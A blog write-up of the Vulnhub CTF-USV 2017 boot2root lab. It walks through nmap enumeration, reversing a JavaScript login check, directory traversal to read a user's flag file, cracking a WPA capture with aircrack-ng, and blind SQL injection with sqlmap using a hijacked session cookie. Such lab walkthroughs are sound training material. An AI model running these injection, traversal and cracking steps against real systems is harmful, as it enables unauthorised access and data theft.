User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

Hello all!

After New Year vacation (3 weeks) it is a good start of the new 2018 with new Vulnhub.com boot2root challenge, today it is CTF-USV 2017

If you are interested in the way how I found all flags - welcome!

 Let's start, IP address could be found after VM is booted.

If you do not want to view all write-up below you can find little hints:

1) Have a look at SSL certificate

2) Have a look at javascript on tcp/80

3) Have a look at page sources on tcp/15020

4) Find webdir with network traffic dump, uncover password and use it

5) Find sql injection in admin area

 

Below you can find my own way how I got flags.

Nmap helps us with enumerating open ports:

Not shown: 65526 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
4369/tcp  open  epmd
5222/tcp  open  xmpp-client
5269/tcp  open  xmpp-server
5280/tcp  open  xmpp-bosh
15020/tcp open  unknown
37833/tcp open  unknown

Next step is to detect service's and OS versions, use these Nmap keys: -A -sV

Ok, we have updated Debian with patched Proftpd 1.3.5b, Jabber service and some http/https services.

 

The first flag is very easy, it is located in SSL certificate data on tcp/15020 : France: a51f0eda836e4461c3316a2ec9dad743

At the first look I was not convinced that it is a flag, but when I found all other flags and only 1 left I decided that it is a flag, because I could not verity it anywhere =)

 

Lets continue with web services, and what we usually do on the first step - yeah, brute subdirs!

http://192.168.56.102/admin2/ and we see something like admin panel, but password is verified in javascript.

Copy this javascript, beautify it and what we have: 1079950212331060 is verified, if true - we got access and see the flag named Italy, if not - red message Incorrect.

To complete this steps just foloow steps back with _0xb252x4 and got the flag.

Italy:46202df2ae6c46db8efc0af148370a78

var _0xeb5f=["value","passinp","password","forms","color","style","valid","getElementById","green","innerHTML","Italy:","red","Incorrect!"];

function validate()
{
var _0xb252x2=123211;
var _0xb252x3=3422543454;
var _0xb252x4=document[_0xeb5f[3]][_0xeb5f[2]][_0xeb5f[1]][_0xeb5f[0]];
var _0xb252x5=md5(_0xb252x4);
_0xb252x4+= 4469;                                                //after minus string = 77779673
_0xb252x4-= 234562221224;                              //after plus = 777796734469
_0xb252x4*= 1988;                                                //after div by 1988 = 543234513245
_0xb252x2-= 2404;
_0xb252x3+= 2980097;

if(_0xb252x4== 1079950212331060)
{
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[8];
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[10]+ _0xb252x5
}

else
{
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[11];
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[12]};
return


Ok, these two flags I got very fast and later stuck a little with web site on tcp/15020 before I saw a commented message about download.php in the page source at http://192.168.56.102/blog/:

A message about image parameter tells us that we have to use post request and probably it is a Directory Traversal!

Created a simple post request in Burp I verified it.

And web server response:

 

Now we can read files, that are available for web service use and in BLOG we remember a comment from Kevin, that flag.txt is located in his house, lets check /home/kevin/flag.txt.

 Third flag is captured: Croatia: e4d49769b40647eddda2fe3041b9564c

 

Ok, 3 flags..I found webdir /admin in blog and tried to find, enumerate, dump all data from the host - no luck, sensitive files are in admin with possible SQL Injection vulnerability. Grabbed data from host was a little bit useless...

I got all usernames, tried to bruteforce ftp, ssh, admin web panel on the blog web site, got mysql username and password - no luck, no way to connect to MySQL server...

It was a time to think once again, "ENUMERATION IS A KEY" appears in my head and I started extended webdirs bruteforce, result was very nice - new webdir named /vault.

 

Now there are 300 webdirs named DoorX with 100 subdirs VaultX in each, time to create simple python script to create "wordlists" and fire-up Burp Intruder, probably there is something useful in one of these dirs.

for i in range (1, 101):
        print "Vault" + str(i)

2 not empty webdirs were uncoverd:

/vault/Door222/Vault70/
ctf.cap
/vault/Door223/Vault1/
rockyou.zip

A fast look on ctf.cap gave an attack vector - determine WPA password and see that can do with it (also there is rockyou.zip...) =)

It is aircrack-ng time: aircrack-ng ctf.cap -w rockyou.txt

Password found: minion.666, nothing interesting was found in the network traffic dump and I decided to check this password on /blog/admin, it works!

Login and see page source - forth flag: Philippines: 551d3350f100afc6fac0e4b48d44d380

 

It is a time to find final flag, sign-in to admin panel, tried to do something like edit post, delete posts - nothing, but from source codes I remember that edit.php probable is vulnerably to SQL Injection.

It is time for SQLMap (because I like it):

//Do not forget about admin cookie =)

sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36'

and it is vulnerable:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9485=9485

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 3390=BENCHMARK(5000000,MD5(0x554e4b4a))

Next steps with enumeration all tables and columns is not so interesting. Finally I got all column names, but SQLMap could not dump data, and we have a SQL Injection => we can use sql query to dump data manually.

Database: blog
[3 tables]
+----------+
| comments |
| posts    |
| users    |
+----------+

[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| id        | numeric     |
| idcountry | numeric     |
| login     | non-numeric |
| password  | non-numeric |
| published | numeric     |
| text      | non-numeric |
| title     | non-numeric |
+-----------+-------------+

sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36' --sql-query='select id,idcountry,login,password from users where id=1'
[*] 1, , admin, 8ae100f50c9bbcfeb2ab87b72a03273d - this is admin password minion.666

Change id=2 and got the flag for Laos.

Laos: 66c578605c1c63db9e8f0aba923d0c12

Finally all flags are captured.

Thank you to Suceava University for this VM!

 

That's all, thank you for reading!

Add comment


Security code
Refresh